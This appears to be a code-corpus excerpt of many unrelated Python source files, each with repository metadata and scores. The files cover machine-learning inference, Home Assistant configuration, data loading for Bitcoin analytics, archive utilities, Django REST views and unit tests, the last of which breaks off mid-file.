# Load the saved meta graph and restore variables
saver = tf.train.import_meta_graph("{}.meta".format(checkpoint_file))
saver.restore(sess, checkpoint_file)
# Get the placeholders from the graph by name
input_x = graph.get_operation_by_name("input_x").outputs[0]
# input_y = graph.get_operation_by_name("input_y").outputs[0]
dropout_keep_prob = graph.get_operation_by_name("dropout_keep_prob").outputs[0]
# Tensors we want to evaluate
predictions = graph.get_operation_by_name("output/predictions").outputs[0]
single_predictions = sess.run(predictions, {input_x: x, dropout_keep_prob: 1.0})
predict_label = label_list[int(single_predictions)]
print(predict_label)
return predict_label
| 2.140625
| 2
|
custom_components/citymind_water_meter/managers/configuration_manager.py
|
elad-bar/citymind_water_meter
| 17
|
12780081
|
from typing import Optional
from homeassistant.config_entries import ConfigEntry
from ..helpers.const import (
CONF_LOG_LEVEL,
CONF_PASSWORD,
CONF_USERNAME,
LOG_LEVEL_DEFAULT,
)
from ..models.config_data import ConfigData
from .password_manager import PasswordManager
class ConfigManager:
data: ConfigData
config_entry: ConfigEntry
password_manager: PasswordManager
def __init__(self, password_manager: Optional[PasswordManager]):
self.password_manager = password_manager
async def update(self, config_entry: ConfigEntry):
data = config_entry.data
options = config_entry.options
result: ConfigData = await self.get_basic_data(data)
result.log_level = options.get(CONF_LOG_LEVEL, LOG_LEVEL_DEFAULT)
self.config_entry = config_entry
self.data = result
async def get_basic_data(self, data):
result = ConfigData()
if data is not None:
result.username = data.get(CONF_USERNAME)
result.password = data.get(CONF_PASSWORD)
if (
result.password is not None
and len(result.password) > 0
and self.password_manager is not None
):
decrypt = self.password_manager.decrypt
result.password_clear_text = await decrypt(result.password)
else:
result.password_clear_text = result.password
return result
@staticmethod
def _get_allowed_option(key, options):
allowed_audio_sensor = None
if key in options:
allowed_audio_sensor = options.get(key, [])
return allowed_audio_sensor
@staticmethod
def _get_config_data_item(key, options, data):
data_result = data.get(key, "")
result = options.get(key, data_result)
return result
| 2.359375
| 2
|
test/test.py
|
casonadams/nvim-colors
| 0
|
12780082
|
<reponame>casonadams/nvim-colors<gh_stars>0
@decorator(param=1)
def f(x):
"""
Syntax Highlighting Demo
@param x Parameter
Semantic highlighting:
Generated spectrum to pick colors for local variables and parameters:
Color#1 SC1.1 SC1.2 SC1.3 SC1.4 Color#2 SC2.1 SC2.2 SC2.3 SC2.4 Color#3
Color#3 SC3.1 SC3.2 SC3.3 SC3.4 Color#4 SC4.1 SC4.2 SC4.3 SC4.4 Color#5
"""
def nested_func(y):
print(y + 1)
s = ("Test", 2+3, {'a': 'b'}, f'{x!s:{"^10"}}') # Comment
f(s[0].lower())
nested_func(42)
if True:
pass
else:
pass
class Foo:
tags: List[str]
def __init__(self: Foo):
byte_string: bytes = b'newline:\n also newline:\x0a'
text_string = u"Cyrillic Я is \u042f. Oops: \u042g"
self.make_sense(whatever=1)
def make_sense(self, whatever):
self.sense = whatever
x = len('abc')
print(f.__doc__)
| 2.828125
| 3
|
variant_remapping_tools/merge_yaml.py
|
diegomscoelho/variant-remapping
| 3
|
12780083
|
#! /usr/bin/env python3
import argparse
import yaml
def merge_two_dict(d1, d2):
result = {}
for key in set(d1) | set(d2):
if isinstance(d1.get(key), dict) or isinstance(d2.get(key), dict):
result[key] = merge_two_dict(d1.get(key, dict()), d2.get(key, dict()))
else:
result[key] = d1.get(key, 0) + d2.get(key, 0)
return result
def merge_yaml_files(input_yamls, output_yaml):
output = {}
for input_yaml in input_yamls:
with open(input_yaml) as open_input:
data = yaml.safe_load(open_input) or {}
output = merge_two_dict(output, data)
with open(output_yaml, 'w') as open_output:
yaml.safe_dump(output, open_output)
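def _example_merge():
    # Hedged sketch (added for illustration, not invoked by the script): overlapping
    # numeric fields are summed and nested dicts are merged recursively.
    merged = merge_two_dict({'reads': 10, 'per_chrom': {'chr1': 2}},
                            {'reads': 5, 'per_chrom': {'chr1': 3, 'chr2': 1}})
    assert merged == {'reads': 15, 'per_chrom': {'chr1': 5, 'chr2': 1}}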
def main():
    description = ('Merge multiple YAML files containing stats by summing the overlapping fields')
parser = argparse.ArgumentParser(description=description)
parser.add_argument('--inputs', type=str, required=True, nargs='+',
help='YAML files containing the input summary metrics')
parser.add_argument('--output', type=str, required=True,
                        help='YAML file containing the output summary metrics')
args = parser.parse_args()
merge_yaml_files(args.inputs, args.output)
if __name__ == '__main__':
main()
| 3.078125
| 3
|
exceRNApipeline/tasks/task_count_exogenous_taxa.py
|
zhuchcn/exceRNAseq
| 1
|
12780084
|
<reponame>zhuchcn/exceRNAseq
from _exceRNApipeline_taxaCounter import taxaCounter
from exceRNApipeline.includes.utils import logger
import os
import argparse
from snakemake.shell import shell
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--input-file", type=str)
parser.add_argument("-o", "--output-prefix", type=str)
parser.add_argument("-d", "--nodes-dmp", type=str)
parser.add_argument("-m", "--names-dmp", type=str)
return parser.parse_args()
def main():
args = parse_args()
    # argparse.ArgumentError requires an argument object as its first parameter, so
    # raising it with a bare message fails; plain filesystem errors carry the message.
    if not os.path.exists(args.input_file):
        raise FileNotFoundError(f"--input-file {args.input_file} does not exist.")
    if not os.path.exists(args.nodes_dmp):
        raise FileNotFoundError(f"--nodes-dmp {args.nodes_dmp} does not exist.")
    if not os.path.exists(args.names_dmp):
        raise FileNotFoundError(f"--names-dmp {args.names_dmp} does not exist.")
    if not os.path.isdir(os.path.dirname(args.output_prefix)):
        msg = f"--output-prefix: you passed {args.output_prefix}, " \
              f"but the directory {os.path.dirname(args.output_prefix)} does not exist."
        raise NotADirectoryError(msg)
taxaCounter(args.input_file, args.output_prefix, args.names_dmp, args.nodes_dmp)
if __name__ == '__main__':
main()
| 2.75
| 3
|
family/inheritance.py
|
jadry92/Python-course-platzi
| 0
|
12780085
|
<filename>family/inheritance.py
class Parent():
def __init__(self, last_name, eye_color):
print("Parent constructor called")
self.last_name = last_name
self.eye_color = eye_color
def show_info(self):
print("Last Name -"+self.last_name)
print("Eyes Color -"+self.eye_color)
class Child(Parent):
def __init__(self, last_name, eye_color, number_of_toys):
print("Child Constructor Called")
Parent.__init__(self, last_name, eye_color)
self.number_of_toys = number_of_toys
#papa = Parent("suarez","brown")
#print(papa.last_name)
yo = Child("suarez", "black", 2)
print(yo.number_of_toys)
yo.show_info()
| 3.8125
| 4
|
Drake-Z/0015/0015.py
|
saurabh896/python-1
| 3,976
|
12780086
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''Problem 0015: The plain-text file city.txt holds city information; its content (including the curly braces) is as follows:
{
"1" : "上海",
"2" : "北京",
"3" : "成都"
}
Write the above content to the city.xls file.'''
__author__ = 'Drake-Z'
import json
from collections import OrderedDict
from openpyxl import Workbook
def txt_to_xlsx(filename):
    # Use a context manager so the file is closed; json.load no longer accepts an
    # encoding keyword on Python 3.9+, the open() call handles the encoding instead.
    with open(filename, 'r', encoding='UTF-8') as file:
        file_content = json.load(file)
    print(file_content)
    workbook = Workbook()
    worksheet = workbook.worksheets[0]
    for i in range(1, len(file_content) + 1):
        worksheet.cell(row=i, column=1).value = i
        worksheet.cell(row=i, column=2).value = file_content[str(i)]
    workbook.save(filename='city.xls')
if __name__ == '__main__':
txt_to_xlsx('city.txt')
| 3.296875
| 3
|
jax/img_arap.py
|
BachiLi/autodiff_comp
| 2
|
12780087
|
import jax
import jax.numpy as np
import time
import skimage.io
num_iter = 10
key = jax.random.PRNGKey(1234)
Mask = np.array(skimage.io.imread('../data/Mask0.png')) > 0
Mask = np.reshape(Mask, [Mask.shape[0], Mask.shape[1], 1])
Offsets = jax.random.uniform(key, shape=[Mask.shape[0], Mask.shape[1], 2], dtype=np.float32)
Angle = jax.random.uniform(key, shape=[Mask.shape[0], Mask.shape[1]], dtype=np.float32)
Offsets_d = jax.random.uniform(key, shape=[Mask.shape[0], Mask.shape[1], 2], dtype=np.float32)
Angle_d = jax.random.uniform(key, shape=[Mask.shape[0], Mask.shape[1]], dtype=np.float32)
UrShape = jax.random.uniform(key, shape=[Mask.shape[0], Mask.shape[1], 2], dtype=np.float32)
Constraints = jax.random.uniform(key, shape=[Mask.shape[0], Mask.shape[1], 2], dtype=np.float32)
C_valid = np.ones(Mask.shape, dtype=Mask.dtype)
def f(Offsets, Angle):
Offsets_left = np.roll(Offsets, shift=-1, axis=0)
Offsets_right = np.roll(Offsets, shift=1, axis=0)
Offsets_up = np.roll(Offsets, shift=-1, axis=1)
Offsets_down = np.roll(Offsets, shift=1, axis=1)
UrShape_left = np.roll(UrShape, shift=-1, axis=0)
UrShape_right = np.roll(UrShape, shift=1, axis=0)
UrShape_up = np.roll(UrShape, shift=-1, axis=1)
UrShape_down = np.roll(UrShape, shift=1, axis=1)
Mask_left = np.roll(Mask, shift=-1, axis=0)
Mask_right = np.roll(Mask, shift=1, axis=0)
Mask_up = np.roll(Mask, shift=-1, axis=1)
Mask_down = np.roll(Mask, shift=1, axis=1)
d_off_left = Offsets - Offsets_left
d_off_right = Offsets - Offsets_right
d_off_up = Offsets - Offsets_up
d_off_down = Offsets - Offsets_down
d_ur_left = UrShape - UrShape_left
d_ur_right = UrShape - UrShape_right
d_ur_up = UrShape - UrShape_up
d_ur_down = UrShape - UrShape_down
cos_angle = np.cos(Angle)
sin_angle = np.sin(Angle)
Rot2D_left = np.stack(\
[cos_angle * d_ur_left[:, :, 0] - sin_angle * d_ur_left[:, :, 1],
sin_angle * d_ur_left[:, :, 0] - cos_angle * d_ur_left[:, :, 1]], -1)
Rot2D_right = np.stack(\
[cos_angle * d_ur_right[:, :, 0] - sin_angle * d_ur_right[:, :, 1],
sin_angle * d_ur_right[:, :, 0] - cos_angle * d_ur_right[:, :, 1]], -1)
Rot2D_up = np.stack(\
[cos_angle * d_ur_up[:, :, 0] - sin_angle * d_ur_up[:, :, 1],
sin_angle * d_ur_up[:, :, 0] - cos_angle * d_ur_up[:, :, 1]], -1)
Rot2D_down = np.stack(\
[cos_angle * d_ur_down[:, :, 0] - sin_angle * d_ur_down[:, :, 1],
sin_angle * d_ur_down[:, :, 0] - cos_angle * d_ur_down[:, :, 1]], -1)
d_diff_left = d_off_left - Rot2D_left
d_diff_right = d_off_right - Rot2D_right
d_diff_up = d_off_up - Rot2D_up
d_diff_down = d_off_down - Rot2D_down
reg_left = np.logical_and(Mask, Mask_left) * d_diff_left * d_diff_left
reg_right = np.logical_and(Mask, Mask_right) * d_diff_right * d_diff_right
reg_up = np.logical_and(Mask, Mask_up) * d_diff_up * d_diff_up
reg_down = np.logical_and(Mask, Mask_down) * d_diff_down * d_diff_down
E_fit = (Offsets - Constraints) * (Offsets - Constraints)
return np.stack([C_valid * 0.5 * E_fit,
0.5 * reg_left,
0.5 * reg_right,
0.5 * reg_up,
0.5 * reg_down], -1)
def JTJx(Offsets, Angle, Offsets_d, Angle_d):
_, Jx = jax.jvp(f, [Offsets, Angle], [Offsets_d, Angle_d])
_, f_vjp = jax.vjp(f, Offsets, Angle)
return f_vjp(Jx)
def JTFx(Offsets, Angle):
Fx, f_vjp = jax.vjp(f, Offsets, Angle)
return f_vjp(Fx)
jf = jax.jit(f)
jJTJx = jax.jit(JTJx)
jJTFx = jax.jit(JTFx)
# jf = f
# jJTJx = JTJx
# jJTFx = JTFx
min_fwd_time = 1e20
min_JTJ_time = 1e20
min_JTFx_time = 1e20
avg_fwd_time = 0
avg_JTJ_time = 0
avg_JTFx_time = 0
for i in range(num_iter + 1):
start = time.time()
y = jf(Offsets, Angle).block_until_ready()
int0 = time.time()
jtjx = jJTJx(Offsets, Angle, Offsets_d, Angle_d)
jtjx[0].block_until_ready()
jtjx[1].block_until_ready()
int1 = time.time()
jtfx = jJTFx(Offsets, Angle)
jtfx[0].block_until_ready()
jtfx[1].block_until_ready()
end = time.time()
if i > 0:
avg_fwd_time += int0 - start
avg_JTJ_time += int1 - int0
avg_JTFx_time += end - int1
if int0 - start < min_fwd_time:
min_fwd_time = int0 - start
if int1 - int0 < min_JTJ_time:
min_JTJ_time = int1 - int0
if end - int1 < min_JTFx_time:
min_JTFx_time = end - int1
print('Minimum forward time:', min_fwd_time)
print('Minimum JTJ time:', min_JTJ_time)
print('Minimum JTFx time:', min_JTFx_time)
print('Ratio minimum JTJ:', min_JTJ_time / min_fwd_time)
print('Ratio minimum JTFx:', min_JTFx_time / min_fwd_time)
print('Average forward time:', avg_fwd_time / num_iter)
print('Average JTJ time:', avg_JTJ_time / num_iter)
print('Average JTFx time:', avg_JTFx_time / num_iter)
print('Ratio average JTJ:', avg_JTJ_time / avg_fwd_time)
print('Ratio average JTFx:', avg_JTFx_time / avg_fwd_time)
| 1.875
| 2
|
gewittergefahr/gg_utils/unzipping.py
|
dopplerchase/GewitterGefahr
| 26
|
12780088
|
"""Methods for unzipping files."""
import os
from gewittergefahr.gg_utils import file_system_utils
from gewittergefahr.gg_utils import error_checking
def unzip_tar(tar_file_name, target_directory_name=None,
file_and_dir_names_to_unzip=None):
"""Unzips tar file.
:param tar_file_name: Path to input file.
:param target_directory_name: Path to output directory.
:param file_and_dir_names_to_unzip: List of files and directories to extract
from the tar file. Each list element should be a relative path inside
the tar file. After unzipping, the same relative path will exist inside
`target_directory_name`.
:raises: ValueError: if the Unix command fails.
"""
error_checking.assert_is_string(tar_file_name)
error_checking.assert_is_string_list(file_and_dir_names_to_unzip)
file_system_utils.mkdir_recursive_if_necessary(
directory_name=target_directory_name)
unix_command_string = 'tar -C "{0:s}" -xvf "{1:s}"'.format(
target_directory_name, tar_file_name)
for this_relative_path in file_and_dir_names_to_unzip:
unix_command_string += ' "' + this_relative_path + '"'
exit_code = os.system(unix_command_string)
if exit_code != 0:
raise ValueError('\nUnix command failed (log messages shown above '
'should explain why).')
def unzip_gzip(gzip_file_name, extracted_file_name):
"""Unzips gzip archive.
    Keep in mind that a gzip archive contains only one file.
:param gzip_file_name: Path to gzip archive.
:param extracted_file_name: The one file in the gzip archive will be saved
here.
:raises: ValueError: if the Unix command fails.
"""
error_checking.assert_is_string(gzip_file_name)
file_system_utils.mkdir_recursive_if_necessary(
file_name=extracted_file_name)
unix_command_string = 'gunzip -v -c "{0:s}" > "{1:s}"'.format(
gzip_file_name, extracted_file_name)
exit_code = os.system(unix_command_string)
if exit_code != 0:
raise ValueError('\nUnix command failed (log messages shown above '
'should explain why).')
def gzip_file(input_file_name, output_file_name=None, delete_input_file=True):
"""Creates gzip archive with one file.
:param input_file_name: Path to input file (will be gzipped).
:param output_file_name: Path to output file (extension must be ".gz"). If
`output_file_name is None`, will simply append ".gz" to name of input
file.
:param delete_input_file: Boolean flag. If True, will delete input file
after gzipping.
:raises: ValueError: if `output_file_name` does not end with ".gz".
:raises: ValueError: if the Unix command fails.
"""
error_checking.assert_file_exists(input_file_name)
error_checking.assert_is_boolean(delete_input_file)
if output_file_name is None:
output_file_name = '{0:s}.gz'.format(input_file_name)
if not output_file_name.endswith('.gz'):
error_string = (
'Output file ("{0:s}") should have extension ".gz".'
).format(output_file_name)
raise ValueError(error_string)
unix_command_string = 'gzip -v -c "{0:s}" > "{1:s}"'.format(
input_file_name, output_file_name)
exit_code = os.system(unix_command_string)
if exit_code != 0:
raise ValueError('\nUnix command failed (log messages shown above '
'should explain why).')
if delete_input_file:
os.remove(input_file_name)
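def _example_gzip_roundtrip():
    """Hedged sketch (added for illustration, not called anywhere): gzip a
    hypothetical file, keep the original, then extract a copy of it."""
    gzip_file('/tmp/example.txt', '/tmp/example.txt.gz', delete_input_file=False)
    unzip_gzip('/tmp/example.txt.gz', '/tmp/example_copy.txt')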
| 3.140625
| 3
|
terbilang.py
|
saih02/terbilang
| 1
|
12780089
|
<reponame>saih02/terbilang<gh_stars>1-10
def hasil(num):
huruf = ['nol', 'satu', 'dua', 'tiga', 'empat', 'lima', 'enam', 'tujuh', 'delapan', 'sembilan', 'sepuluh', 'sebelas']
if num < 12:
temp = ' '+huruf[num]
elif num < 20:
temp = str(hasil(num-10))+' belas'
elif num < 100:
temp = str(hasil(num//10))+' puluh'+str(hasil(num%10))
elif num < 200:
temp = ' seratus'+str(hasil(num-100))
elif num < 1000:
temp = str(hasil(num//100))+' ratus'+str(hasil(num%100))
elif num < 2000:
temp = ' seribu'+str(hasil(num-1000))
elif num < 1000000:
temp = str(hasil(num//1000))+' ribu'+str(hasil(num%1000))
elif num < 1000000000:
temp = str(hasil(num//1000000))+' juta'+str(hasil(num%1000000))
elif num < 1000000000000:
temp = str(hasil(num//1000000000))+' milyar'+str(hasil(num%1000000000))
elif num < 1000000000000000:
temp = str(hasil(num//1000000000000))+' trilyun'+str(hasil(num%1000000000000))
return temp
def terbilang(num):
if num < 0:
        hasilV = 'minus' + hasil(-num)
else:
hasilV = hasil(num)
return hasilV
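if __name__ == "__main__":
    # Hedged examples (added for illustration) of the number-to-words conversion;
    # note that hasil() builds its result with a leading space.
    print(terbilang(11))    # ' sebelas'
    print(terbilang(1995))  # ' seribu sembilan ratus sembilan puluh lima'
    print(terbilang(-42))   # 'minus empat puluh dua'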
| 3.40625
| 3
|
author/views.py
|
IanSeng/CMPUT404_PROJECT
| 0
|
12780090
|
from rest_framework import generics, authentication, permissions
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.exceptions import ValidationError, AuthenticationFailed
from rest_framework.authtoken.models import Token
from rest_framework.response import Response
from rest_framework import status
from django.contrib.auth import get_user_model
from django.shortcuts import get_object_or_404
from author.serializers import AuthorSerializer, AuthAuthorSerializer, AuthorProfileSerializer
class CreateAuthorView(generics.CreateAPIView):
"""Create a new author in the system"""
serializer_class = AuthorSerializer
class AuthAuthorView(ObtainAuthToken):
"""Authenticate author in the system"""
serializer_class = AuthAuthorSerializer
def post(self, request, *args, **kwargs):
serializer = self.serializer_class(data=request.data,
context={'request': request})
serializer.is_valid(raise_exception=True)
author = serializer.validated_data['user']
token, created = Token.objects.get_or_create(user=author)
if not author.adminApproval:
return Response({"error": ["User has not been approved by admin"]}, status=status.HTTP_401_UNAUTHORIZED)
return Response({
'token': token.key,
})
class AuthorProfileView(generics.RetrieveUpdateAPIView):
"""Get author in the system"""
serializer_class = AuthorProfileSerializer
    authentication_classes = (authentication.TokenAuthentication,)
permission_classes = (permissions.IsAuthenticated,)
http_method_names = ["get", "put"]
def get_object(self):
id = self.kwargs['pk']
try:
return get_object_or_404(get_user_model().objects, id=id)
except:
raise ValidationError({"error": ["User not found"]})
class MyProfileView(generics.RetrieveAPIView):
"""Get authenticated author profile in the system"""
serializer_class = AuthorProfileSerializer
    authentication_classes = (authentication.TokenAuthentication,)
permission_classes = (permissions.IsAuthenticated,)
http_method_names = ["get"]
def get_object(self):
if not self.request.user.adminApproval:
raise AuthenticationFailed(detail ={"error": ["User has not been approved by admin"]})
return self.request.user
| 2.140625
| 2
|
src/web/pager.py
|
dzca/net-audit
| 0
|
12780091
|
<gh_stars>0
#!/usr/bin/python
class Pager:
    def __init__(self, size, count, page):
        # State lives on private attributes so the read-only properties below do not
        # clash with them (assigning to self.size/self.pages would raise AttributeError
        # because those names are properties).
        self._size = size
        self._count = count
        self._pages = self._init_pages()
        self._page = page
    def _init_pages(self):
        pages = self._count // self._size
        if self._count % self._size == 0:
            return pages
        return pages + 1
    @property
    def current(self):
        return self._page
    @property
    def pages(self):
        return self._pages
    @property
    def previous(self):
        if self._page > 1:
            return self._page - 1
        return 0
    @property
    def next(self):
        if self._page == self._pages:
            return 0
        return self._page + 1
    @property
    def size(self):
        return self._size
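if __name__ == "__main__":
    # Hedged sketch (added for illustration): 23 items paged 10 at a time give 3
    # pages; on the last page there is no next page, signalled by 0.
    pager = Pager(size=10, count=23, page=3)
    print(pager.pages, pager.previous, pager.next)  # -> 3 2 0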
| 3.53125
| 4
|
100-Exercicios/ex017.py
|
thedennerdev/ExerciciosPython-Iniciante
| 0
|
12780092
|
# Write a program that reads the lengths of the opposite and adjacent legs of a right triangle.
# Compute and display the length of the hypotenuse.
"""co = float(input('Opposite leg length: '))
ca = float(input('Adjacent leg length: '))
hi = (co ** 2 + ca ** 2) ** (1/2)
print('The hypotenuse is {:.2f}'.format(hi))"""
'''import math
co = float(input('Enter the opposite leg length: '))
ca = float(input('Enter the adjacent leg length: '))
hi = math.hypot(co, ca)
print('The hypotenuse is {:.2f}'.format(hi))'''
from math import hypot
co = float(input('Opposite leg length: '))
ca = float(input('Adjacent leg length: '))
hi = hypot(co, ca)
print('The hypotenuse will be {:.2f}'.format(hi))
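# Hedged sanity check (added for illustration): the classic 3-4-5 right triangle has
# a hypotenuse of exactly 5.
print('Check: hypot(3, 4) = {:.2f}'.format(hypot(3, 4)))  # -> 5.00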
| 4.03125
| 4
|
two_thinning/average_based/RL/basic_neuralnet_RL/train.py
|
varikakasandor/dissertation-balls-into-bins
| 0
|
12780093
|
import numpy as np
import torch
import torch.nn as nn
from two_thinning.average_based.RL.basic_neuralnet_RL.neural_network import AverageTwoThinningNet
n = 10
m = n
epsilon = 0.1
train_episodes = 3000
eval_runs = 300
patience = 20
print_progress = True
print_behaviour = False
def reward(x):
return -np.max(x)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def greedy(model, ball_number):
action_values = model(torch.DoubleTensor([ball_number]))
a = torch.argmax(action_values)
return a
def epsilon_greedy(model, ball_number, epsilon=epsilon):
action_values = model(torch.DoubleTensor([ball_number]))
r = torch.rand(1)
if r < epsilon:
a = torch.randint(len(action_values), (1,))[0]
else:
a = torch.argmax(action_values)
return a, action_values[a]
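# Note: the network output is interpreted as a load threshold for the two-thinning
# rule used below -- if the first uniformly sampled bin has load <= a, the ball is
# placed there, otherwise it goes into a second uniformly sampled bin.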
def evaluate_q_values(model, n=n, m=m, reward=reward, eval_runs=eval_runs, print_behaviour=print_behaviour):
with torch.no_grad():
sum_loads = 0
for _ in range(eval_runs):
loads = np.zeros(n)
for i in range(m):
a = greedy(model, i)
if print_behaviour:
print(f"With loads {loads} the trained model chose {a}")
randomly_selected = np.random.randint(n)
if loads[randomly_selected] <= a:
loads[randomly_selected] += 1
else:
loads[np.random.randint(n)] += 1
sum_loads += reward(loads)
avg_score = sum_loads / eval_runs
return avg_score
def train(n=n, m=m, epsilon=epsilon, reward=reward, episodes=train_episodes, eval_runs=eval_runs, patience=patience,
print_progress=print_progress, print_behaviour=print_behaviour, device=device):
curr_model = AverageTwoThinningNet(m, device)
best_model = AverageTwoThinningNet(m, device)
optimizer = torch.optim.Adam(curr_model.parameters())
mse_loss = nn.MSELoss()
best_eval_score = None
not_improved = 0
for ep in range(episodes):
loads = np.zeros(n)
for i in range(m):
a, old_val = epsilon_greedy(curr_model, i, epsilon)
randomly_selected = np.random.randint(n)
if loads[randomly_selected] <= a:
loads[randomly_selected] += 1
else:
loads[np.random.randint(n)] += 1
if i == m - 1:
new_val = torch.as_tensor(reward(loads)).to(device)
else:
_, new_val = epsilon_greedy(curr_model, i + 1, epsilon)
new_val = new_val.detach()
loss = mse_loss(old_val, new_val)
optimizer.zero_grad()
loss.backward()
optimizer.step()
curr_eval_score = evaluate_q_values(curr_model, n=n, m=m, reward=reward, eval_runs=eval_runs,
print_behaviour=print_behaviour)
if best_eval_score is None or curr_eval_score > best_eval_score:
best_eval_score = curr_eval_score
best_model.load_state_dict(curr_model.state_dict())
not_improved = 0
if print_progress:
print(f"At episode {ep} the best eval score has improved to {curr_eval_score}.")
elif not_improved < patience:
not_improved += 1
if print_progress:
print(f"At episode {ep} no improvement happened.")
else:
if print_progress:
print(f"Training has stopped after episode {ep} as the eval score didn't improve anymore.")
break
return best_model
if __name__ == "__main__":
train()
| 2.859375
| 3
|
echopype/tests/test_2in1_ek80_convert.py
|
Chuck-A/echopype
| 0
|
12780094
|
from pathlib import Path
from echopype.convert import Convert
def test_2in1_ek80_conversion():
file = Path("./echopype/test_data/ek80/Green2.Survey2.FM.short.slow.-D20191004-T211557.raw").resolve()
nc_path = file.parent.joinpath(file.stem+".nc")
tmp = Convert(str(file), model="EK80")
tmp.raw2nc()
del tmp
nc_path.unlink()
| 2.375
| 2
|
exercises/0389-FindTheDifference/find_the_difference_test.py
|
tqa236/leetcode-solutions
| 1
|
12780095
|
import random
import string
import unittest
from find_the_difference import Solution
from hypothesis import given
from hypothesis.strategies import text
class Test(unittest.TestCase):
def test_1(self):
solution = Solution()
self.assertEqual(solution.findTheDifference("abcd", "abcde"), "e")
@given(text())
def test_random(self, s):
solution = Solution()
random_letter = random.choice(string.ascii_letters)
t = list(s + random_letter)
random.shuffle(t)
t = "".join(t)
self.assertEqual(solution.findTheDifference(s, t), random_letter)
if __name__ == "__main__":
unittest.main()
| 3.5625
| 4
|
src/load_data.py
|
agalbachicar/swing_for_the_fences
| 0
|
12780096
|
import os
import logging
import json
import pandas as pd
def data_paths_from_periodicity(periodicity):
if periodicity == 'hourly':
return ['../datasets/bitstamp_data_hourly.csv']
elif periodicity == 'daily':
return ['../datasets/bitstamp_data_daily.csv']
return ['../datasets/bitstamp_data.csv.part1',
'../datasets/bitstamp_data.csv.part2',
'../datasets/bitstamp_data.csv.part3',
'../datasets/bitstamp_data.csv.part4',
'../datasets/bitstamp_data.csv.part5']
def load_btc_data(periodicity):
file_paths = data_paths_from_periodicity(periodicity)
    # Helper that converts unix-timestamp values into datetime objects.
def unix_time_to_date(x): return pd.to_datetime(x, unit='s')
li = []
for filename in file_paths:
df = pd.read_csv(filename, parse_dates=[
'Timestamp'], date_parser=unix_time_to_date, index_col='Timestamp')
li.append(df)
return pd.concat(li, axis=0)
def load_btc_csv(filepath):
    # Helper that converts unix-timestamp values into datetime objects.
def unix_time_to_date(x): return pd.to_datetime(x, unit='s')
return pd.read_csv(filepath, parse_dates=['Timestamp'], date_parser=unix_time_to_date, index_col='Timestamp')
def load_glassnode_json():
glassnode_json_directory = '../datasets/glassnode/json/'
df = pd.DataFrame()
for f in os.listdir(glassnode_json_directory):
if f.endswith('.json'):
col_name = f[:-len('.json')]
df0 = pd.read_json(os.path.join(glassnode_json_directory, f),
orient='records', precise_float=True,
convert_dates=['t'])
# Sets the index
df0.rename(columns={'t': 'Timestamp'}, inplace=True)
df0.set_index('Timestamp', inplace=True)
# Change column name
if 'v' in df0.columns:
df0.rename(columns={'v': col_name}, inplace=True)
else:
columns = df0['o'][0].keys()
# TODO: stock-to-flow.json requires a special treatment.
if 'ratio' in columns:
df0['ratio'] = df0['o'].apply(lambda x: x['ratio'])
df0['daysTillHalving'] = df0['o'].apply(
lambda x: x['daysTillHalving'])
else:
for c in columns:
df0[[c]] = df0['o'].map(lambda d: d[c])
df0.drop(['o'], axis=1, inplace=True)
# Merge it
if df.empty:
df = df0
else:
df = pd.merge(df, df0, how='inner', left_index=True,
right_index=True)
return df
def load_glassnode_csv():
return load_btc_csv('../datasets/glassnode/csv/dataset.csv')
def load_gtrends_csv():
# Correctly parses the date.
def date_to_pandas_datetime(x): return pd.to_datetime(x, format='%Y-%m-%d')
df = pd.read_csv('../datasets/google_trends/gtrends.csv', parse_dates=[
'Timestamp'], date_parser=date_to_pandas_datetime, index_col='Timestamp')
df.sort_index(inplace=True)
return df
def load_alternative_me_csv():
# Correctly parses the date.
def date_to_pandas_datetime(x): return pd.to_datetime(x, format='%d-%m-%Y')
df = pd.read_csv('../datasets/alternative_me/alternative_me.csv', parse_dates=[
'Timestamp'], date_parser=date_to_pandas_datetime, index_col='Timestamp')
# Convert SentimentClassification into a factor
df['SentimentClassificationFactor'], _ = pd.factorize(
df.SentimentClassification)
# Removes the used column
df.drop('SentimentClassification', inplace=True, axis=1)
df.sort_index(inplace=True)
return df
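# Minimal usage sketch (illustrative; assumes the ../datasets files are present):
# btc_hourly = load_btc_data('hourly')
# glassnode = load_glassnode_csv()
# fear_greed = load_alternative_me_csv()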
| 2.828125
| 3
|
code/tests/unit/api/test_enrich.py
|
CiscoSecurity/tr-05-serverless-alienvault-otx
| 1
|
12780097
|
from http import HTTPStatus
from random import sample
from unittest import mock
from urllib.parse import quote
from pytest import fixture
import jwt
from api.mappings import Sighting, Indicator, Relationship
from .utils import headers
def implemented_routes():
yield '/observe/observables'
yield '/refer/observables'
@fixture(scope='module',
params=implemented_routes(),
ids=lambda route: f'POST {route}')
def implemented_route(request):
return request.param
@fixture(scope='module')
def invalid_json():
return [{'type': 'unknown', 'value': ''}]
def test_enrich_call_with_invalid_json_failure(implemented_route,
client,
invalid_json):
response = client.post(implemented_route, json=invalid_json)
# The actual error message is quite unwieldy, so let's just ignore it.
expected_payload = {
'errors': [
{
'code': 'invalid payload received',
'message': mock.ANY,
'type': 'fatal',
}
]
}
assert response.status_code == HTTPStatus.OK
assert response.get_json() == expected_payload
def avotx_api_routes():
yield '/observe/observables'
@fixture(scope='module',
params=avotx_api_routes(),
ids=lambda route: f'POST {route}')
def avotx_api_route(request):
return request.param
def all_routes():
yield '/deliberate/observables'
yield '/observe/observables'
yield '/refer/observables'
@fixture(scope='module',
params=all_routes(),
ids=lambda route: f'POST {route}')
def any_route(request):
return request.param
def avotx_api_response(status_code):
mock_response = mock.MagicMock()
mock_response.status_code = status_code
if status_code == HTTPStatus.OK:
indicator_types = [
'domain',
'FileHash-MD5',
'FileHash-SHA1',
'FileHash-SHA256',
'IPv4',
'IPv6',
'URL',
]
pulse = {
'author': {
'username': 'JoriQ',
},
'description': (
'This is simply the best pulse in the history of humankind!'
),
'id': 'q1w2e3r4t5y6',
'indicator_type_counts': {
indicator_type: 1
for indicator_type in indicator_types
},
'name': 'Best Pulse Ever',
'tags': ['open', 'threat', 'exchange'],
'TLP': 'white',
}
indicators = [
{
'indicator': 'jsebnawkndwandawd.sh',
'created': '1970-01-01T00:00:00',
'expiration': None,
},
{
'indicator': 'd8414d743778cae103c15461200ec64d',
'created': '1970-01-02T00:00:00',
'expiration': None,
},
{
'indicator': '4f79d1a01b9b5cb3cb65a9911db2a02ea3bb7c45',
'created': '1970-01-03T00:00:00',
